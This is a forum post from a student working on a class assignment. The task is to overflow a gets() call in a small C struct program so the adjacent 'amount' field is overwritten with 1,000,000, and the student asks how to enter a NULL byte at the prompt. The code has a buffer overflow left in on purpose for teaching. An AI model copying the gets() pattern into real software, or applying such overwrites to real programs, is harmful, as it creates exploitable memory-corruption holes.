I’ve got a strange assignment from a class in which I’m supposed to initiate a buffer overrun to see how easy it is for someone to take advantage of the gets() function.
The basic program that I’m given is this:
Code:
typedef struct student
{
char name[20];
float amount;
int other_stuff;
} person;
int _tmain(int argc, _TCHAR* argv[])
{
person p; // Create a person account (on the stack)
p.amount = 10.0; // set amount
printf("enter name: ");
gets(p.name); // get name (blindly ignoring buffer overrun)
printf("Here is a $%6.2f gift for %s\n", p.amount, p.name);
getch(); // Wait for user to type <Enter> before quitting
return 0;
}
I understand that if I write more than 20 characters and the command prompt I will start writing in to the area in memory where “amount” is located so I can change it to anything that I want it to be. We are supposed to set the “amount” to 1,000,000 which I’ve figured out is – 0x00 0x24 0x74 0x49 when arranged in memory. I know that I can hold down alt and input the decimal equivalent of those numbers to overwrite memory but I can’t get a NULL to work for my first byte.
In a perfect world I would use this NULL after I enter my name then put in whatever I want up until I get to the amount area in memory and write in alt 000, alt 036, alt 116, alt 073. Unfortunately I can’t get alt 000 to register and I’m wondering if there is another way to put a NULL bit in to the stream at a command prompt.
Does anyone have any ideas?
***EDIT***
I might be wrong on what I need to enter as now looking in my debugger I see a different hex representation for 1,000,000 - 0x00 0x50 0xc3 0x47